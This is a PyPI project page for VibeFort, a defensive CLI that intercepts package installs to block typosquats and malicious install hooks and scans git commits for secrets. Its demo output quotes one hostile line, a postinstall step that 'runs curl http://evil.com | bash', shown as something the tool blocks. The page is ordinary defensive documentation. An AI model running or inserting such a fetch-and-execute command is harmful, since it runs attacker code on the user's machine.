Skip to main content

Security layer for AI-assisted development. One command, permanent protection.

Project description

🏰 VibeFort

Security layer for AI-assisted development. One command, permanent protection.

VibeFort protects vibecoders (Cursor, Bolt, Replit, Claude Code users) from supply chain attacks, leaked secrets, and insecure AI-generated code. Run vibefort install once — it silently protects every package install and git commit forever.

Quick Start

pipx install vibefort
vibefort install

That's it. You never type vibefort again.

Why pipx? VibeFort is a system-wide CLI tool, not a project dependency. pipx installs it globally in an isolated environment — the standard way to install Python CLI tools. Install pipx if you don't have it: brew install pipx (macOS) or apt install pipx (Ubuntu).

What Happens After Install

# Normal pip usage — VibeFort intercepts silently
$ pip install flask
✔ flask 3.1.0  clean (0.2s)

$ pip install reqeusts
✖ BLOCKED  Possible typosquat  similar to 'requests'
  Did you mean: requests

$ npm install evil-pkg
✖ BLOCKED  suspicious postinstall script: downloads external payload
  package.json: postinstall runs curl http://evil.com | bash

# Normal git usage — VibeFort scans staged files
$ git commit -m "add config" VibeFort blocked this commit  1 secret(s) found
  Secret found in src/config.py:14
  AWS Access Key detected

Supported Package Managers

VibeFort intercepts 10 package managers across Python and Node.js:

Python

Manager Commands intercepted
pip / pip3 pip install flask, pip install flask==3.1.0
uv uv pip install flask, uv add flask
pipx pipx install black

Node.js

Manager Commands intercepted
npm npm install, npm add, npm i
npx npx create-react-app (scans before execute)
yarn yarn add express
pnpm pnpm add express
bun bun add express
bunx bunx cowsay (scans before execute)

npx and bunx are especially dangerous — they download AND execute code in one step. VibeFort scans the package before allowing execution.

How It Works

Package Scanning (automatic)

Every package install goes through two tiers:

Tier What it checks Speed When
Tier 1 Known-safe cache (10k packages), typosquatting, registry existence, slopsquatting < 500ms Every install
Tier 2 Downloads to temp, inspects setup.py/package.json hooks, .pth files, obfuscated code 3-5s Unknown packages

Secret Scanning (automatic)

Git pre-commit hook powered by betterleaks (234 detection rules):

  • AWS, OpenAI, Anthropic, GitHub, Stripe, Google API keys
  • SSH/PGP private keys, JWT tokens
  • Database connection strings
  • And 220+ more patterns

Coming Soon

  • vibefort scan . — code vulnerability scanning (SQL injection, XSS, insecure deserialization)
  • vibefort infra . — infrastructure auditing (Supabase, Firebase, open S3 buckets)
  • vibefort audit — system compromise check
  • AI-powered analysis with plain-English explanations

Commands

Command Description
vibefort install One-time setup: hooks + secret scanner
vibefort uninstall Clean removal of all hooks
vibefort status Dashboard with scan stats
vibefort --version Show version

How Install Works

vibefort install does two things that persist forever:

  1. Shell hook — Adds function wrappers to ~/.zshrc or ~/.bashrc that intercept all 10 package managers. Loads every time a terminal opens.

  2. Git hook — Sets a global pre-commit hook via git config --global core.hooksPath. Applies to every repo.

A 🏰 castle icon appears in your terminal when VibeFort is active.

vibefort uninstall cleanly removes both.

License

MIT — see LICENSE.

Secret scanning powered by betterleaks (MIT). See THIRD_PARTY_NOTICES.

Project details


Download files

Download the file for your platform. If you're not sure which to choose, learn more about installing packages.

Source Distribution

vibefort-0.2.2.tar.gz (158.1 kB view details)

Uploaded Source

Built Distribution

If you're not sure about the file name format, learn more about wheel file names.

vibefort-0.2.2-py3-none-any.whl (138.9 kB view details)

Uploaded Python 3

File details

Details for the file vibefort-0.2.2.tar.gz.

File metadata

  • Download URL: vibefort-0.2.2.tar.gz
  • Upload date:
  • Size: 158.1 kB
  • Tags: Source
  • Uploaded using Trusted Publishing? No
  • Uploaded via: twine/6.2.0 CPython/3.14.3

File hashes

Hashes for vibefort-0.2.2.tar.gz
Algorithm Hash digest
SHA256 fc03c3aaec4ce86b781764cb2889d93636c029e8a95359ef9840de2e53e2807f
MD5 bd469b8848ece9f32cf04a0deccc1968
BLAKE2b-256 5783bd9e51d4cc55e41311248b0fc07a33fce0faa96345dc9320b6939d9c0069

See more details on using hashes here.

File details

Details for the file vibefort-0.2.2-py3-none-any.whl.

File metadata

  • Download URL: vibefort-0.2.2-py3-none-any.whl
  • Upload date:
  • Size: 138.9 kB
  • Tags: Python 3
  • Uploaded using Trusted Publishing? No
  • Uploaded via: twine/6.2.0 CPython/3.14.3

File hashes

Hashes for vibefort-0.2.2-py3-none-any.whl
Algorithm Hash digest
SHA256 c71ad01a58cd71d6ad4ab76f46bedfeb4336bcac01939ed88d897530af1a3cfb
MD5 2f31afe4f05dd617ead5f8a0dce21606
BLAKE2b-256 cd19d3d87dfb69f2c1b108ab7080f79fbc8c61767ebd7691eaaf05e5d8c4a7da

See more details on using hashes here.

Supported by

AWS Cloud computing and Security Sponsor Datadog Monitoring Depot Continuous Integration Fastly CDN Google Download Analytics Pingdom Monitoring Sentry Error logging StatusPage Status page